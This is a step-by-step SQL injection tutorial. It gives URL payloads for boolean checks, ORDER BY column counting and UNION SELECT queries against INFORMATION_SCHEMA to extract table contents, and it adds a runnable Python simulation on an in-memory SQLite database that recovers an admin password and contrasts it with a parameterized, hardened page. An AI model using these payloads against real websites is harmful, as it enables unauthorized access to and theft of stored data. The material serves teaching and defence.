sql-injection guide
SQL-injection in a nutshell
Most sites use a database for their backend. In the URL of these sites you can often find GET data, like example.com?textid=4. This usually means that the number '4' is used somewhere in a database query. (Another option would be that the number is used to look up a file with that name, but let's assume that this is a database-driven site.)
Modifying that value can produce an error: try a very high number, some special characters, or a letter instead of a number. If the column is of type 'int' and you feed it a character, the database will most likely return an error, which is what we're looking for. That error often shows too much information, like the database type, the table name, or even the complete query. How much is shown depends on the measures the coder or server admin has taken. In PHP, for example, you can easily suppress error messages by adding a '@' in front of a function call. Filtering/validating the GET or POST data is an even better way to avoid these mistakes (protip: for parameters that should be numbers, accept nothing but digits, and hand every value to the database as a bound parameter instead of pasting it into the query text; a site set up this way leaves an SQL injection attempt very little to work with). Note that hiding the error message only hides the symptom: the injected SQL still runs, it just has to be confirmed without an error to read, for example by comparing the page for an always-true and an always-false condition.
Once you know that the website is vulnerable, there are a few steps to take:
* find the right format to execute queries: do you have to add some extra ) , " , ' or ; to close off the original statement?
* get table names
* get more information about the DB, like what is in INFORMATION_SCHEMA.
* test if there are more vulnerabilities, like stored procedures or master..Xp_cmdshell (knowing this could save some time ;)
* execute queries against the tables you want.
* make sure there is some way for you to read the output.
SQL commands, quick reference
ORDER BY: Sorts the result rows by the given column. ORDER BY n sorts by the n-th column of the select list and fails if there is no n-th column; that is what the column-counting trick below relies on.
SELECT : Reads certain columns from a table.
UPDATE : Changes existing information in a column of a table.
AND : Both conditions must be true for a row to be returned.
OR : Only one of the conditions must be true for a row to be returned.
-- : Starts a comment, so whatever the original query had after your injection point is ignored and your injected statement does not have to be closed off (on MySQL the dashes must be followed by a space, '-- ', or use '#' instead).
+ : In a URL query string the plus sign is decoded as a space, so use it instead of typing a space (%20 works as well).
0. check if the site is vulnerable
Many url's look something like this: www.domain.com?id=10
TRY:
www.mydomain.com?id=10+AND+1=0--
and compare the result with
www.mydomain.com?id=10+AND+1=1--
1=0 is always false, so if the injection works the page that normally shows item 10 now comes back empty or different, while the 1=1 version looks exactly like the original. That is not an error by itself; if you do get a query error, the statement wasn't closed off properly (see step 1), and that error message probably gives you a clue about the database and such. If both pages look exactly like the original then the value is filtered or isn't used in a query at all, and if you only get a blank or generic page then error messages have been turned off or some other measures have been taken.
(or)
TRY:
www.mydomain.com/home.asp?id=10+HAVING+1=1--
This will result in an error like this (the 'table.column' part is the first column of the original query, so the message leaks a table name and a column name):
Column 'table.column' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
or, on an Access backend, something starting with
Microsoft JET Database Engine ...
1. watch the query error carefully. Are some extra ', ", ), etc. needed to close off the original statement before your own SQL is accepted?
2. how many columns are displayed on the page?
Add this to the url:
+ORDER+BY+1--
example:
www.mydomain.net/home.asp?id=10+ORDER+BY+1--
ORDER BY 1 sorts the result by its first column, which always works.
TRY:
+ORDER+BY+2--
+ORDER+BY+3--
etc.
until you receive an error. ORDER BY n fails as soon as n is larger than the number of columns in the select list, so the last n that worked is the number of columns the original query returns. That is the number of columns your UNION SELECT has to supply in the next steps (it is the query's column count, not necessarily the whole table's).
3. INFORMATION_SCHEMA
get information from the information_schema about this table:
TRY:
www.mydomain.net/home.asp?id=-10+UNION+SELECT+1,table_name,3,4+FROM+INFORMATION_SCHEMA.TABLES--
The id is made negative (-10) so the original query matches nothing and the only rows left to display are the ones your UNION adds. This probably shows some extra numbers and word(s) on the site.
1,table_name,3,4 are the four columns found in step 2; column 2 now shows a table name. A UNION needs the same number of columns as the original query and the types have to be compatible, so if nothing shows up, move table_name to each of the other positions in turn (it has to land in a text column that the page actually displays), like:
1,2,table_name,4
4. Find the right table
TRY: (www.mydomain.net/home.asp?)
id=-10+UNION+SELECT+1,table_name,3,4+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_name>'KnownTable'--
'KnownTable' should be replaced by the table name that you've figured out. A detail page typically renders only the first row it gets, so asking for names greater than the one you already know lets you 'navigate' through the tables one at a time.
Repeat step 3 if necessary.
5. Get column names
TRY:
www.mydomain.net/home.asp?id=-1+UNION+SELECT+1,column_name,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='KnownTable'--
(use as many placeholders as you found in step 2; the examples here assume four)
then 'navigate' the columns the same way as the tables:
id=-1+UNION+SELECT+1,column_name,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='KnownTable'+AND+column_name>'KnownColumn'--
This shows the column name after KnownColumn.
6. showing output
Use the UNION statement to 'add' your own query to the original one. Use the table and column names that you've found.
TRY:
www.mydomain.net/home.asp?id=-1+UNION+SELECT+1,KnownColumn,3,4+FROM+KnownTable--
This will most likely show some content from that column (let's say we call it 'SomeData').
TRY:
www.mydomain.net/home.asp?id=-1+UNION+SELECT+1,AnotherColumn,3,4+FROM+KnownTable+WHERE+KnownColumn='SomeData'--
or possibly:
id=-1+UNION+SELECT+*+FROM+KnownTable+WHERE+KnownColumn='SomeData'--
The SELECT * variant only works when KnownTable has exactly as many columns as the original query (and their types line up), because a UNION requires matching column counts.
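The whole procedure above (the 1=1/1=0 check of step 0, the ORDER BY column count of step 2, the UNION SELECT reads of steps 3 to 6) together with the defence from the introduction, as an added, runnable example; this is not code from the original page. It simulates the site's backend with an in-memory SQLite database, which is an assumption of the example: SQLite has no INFORMATION_SCHEMA, so its sqlite_master table and pragma_table_info() stand in for INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS, and the tables, columns and rows are constructed for the demonstration. vulnerable_page() pastes the id parameter into the query text the way the vulnerable pages above do; safe_page() is the same page with the digit check and a bound parameter.

```python
# Added example (not from the original page): the ORDER BY / UNION SELECT
# procedure run against a constructed, in-memory SQLite backend.
import sqlite3

# Constructed schema that stands in for the site's real database.
SCHEMA = """
CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT);
CREATE TABLE users(id INTEGER, username TEXT, passwd TEXT);
INSERT INTO articles VALUES (10, 'Welcome', 'Hello world', 'editor');
INSERT INTO users VALUES (1, 'admin', 's3cret');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_page(db, id_param):
    """home.asp?id=... as the page above describes it: the GET value is pasted
    straight into the SQL text.  Returns (rows, error_message_or_None)."""
    query = "SELECT id, title, body, author FROM articles WHERE id=" + id_param
    try:
        return db.execute(query).fetchall(), None
    except sqlite3.Error as e:
        return [], str(e)


def safe_page(db, id_param):
    """The hardened version of the same page: the value must be digits (with an
    optional leading '-') and is passed as a bound parameter, so it can never
    become part of the SQL text."""
    digits = id_param[1:] if id_param.startswith("-") else id_param
    if not digits.isdigit():
        return [], "invalid id"
    query = "SELECT id, title, body, author FROM articles WHERE id=?"
    return db.execute(query, (int(id_param),)).fetchall(), None


def boolean_test(db, page=vulnerable_page):
    """Step 0: compare an always-true with an always-false condition.  A
    vulnerable page shows item 10 for 1=1 and nothing (but no error) for 1=0."""
    true_rows, _ = page(db, "10 AND 1=1--")
    false_rows, _ = page(db, "10 AND 1=0--")
    return bool(true_rows) and not false_rows


def count_columns(db, page=vulnerable_page, limit=20):
    """Step 2: ORDER BY 1, 2, 3, ... until the database complains; the last n
    that worked is the number of columns in the original select list."""
    for n in range(1, limit + 1):
        _, err = page(db, f"10 ORDER BY {n}--")
        if err:
            return n - 1
    return None


def union_probe(db, expr, source, where="", ncols=4, page=vulnerable_page):
    """Steps 3-6: id=-10 makes the real query match nothing, so the only rows
    the page renders are the ones our UNION adds.  expr goes into column 2 (a
    text column in this constructed schema); the other positions are fillers.
    Returns (values shown in column 2, error_message_or_None)."""
    fillers = ["1", expr] + [str(i) for i in range(3, ncols + 1)]
    payload = f"-10 UNION SELECT {','.join(fillers)} FROM {source}{where}--"
    rows, err = page(db, payload)
    return [row[1] for row in rows], err


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", boolean_test(db))
    ncols = count_columns(db)
    print("columns in the select list:", ncols)
    # sqlite_master / pragma_table_info stand in for INFORMATION_SCHEMA here.
    print("tables:", union_probe(db, "name", "sqlite_master", " WHERE type='table'", ncols)[0])
    print("next table after 'articles':",
          union_probe(db, "name", "sqlite_master", " WHERE type='table' AND name>'articles'", ncols)[0])
    print("columns of users:", union_probe(db, "name", "pragma_table_info('users')", "", ncols)[0])
    print("admin password:", union_probe(db, "passwd", "users", " WHERE username='admin'", ncols)[0])
    # The same probes against the hardened page learn nothing.
    print("hardened page vulnerable:", boolean_test(db, safe_page),
          "columns found:", count_columns(db, safe_page))
```

Running it walks the steps in order: the boolean test reports True, ORDER BY counts four columns, the UNION probes list the two tables, the columns of users and finally the admin password, and the same calls against safe_page() return "invalid id" at the first probe, so the column count comes out as 0 and nothing is learned.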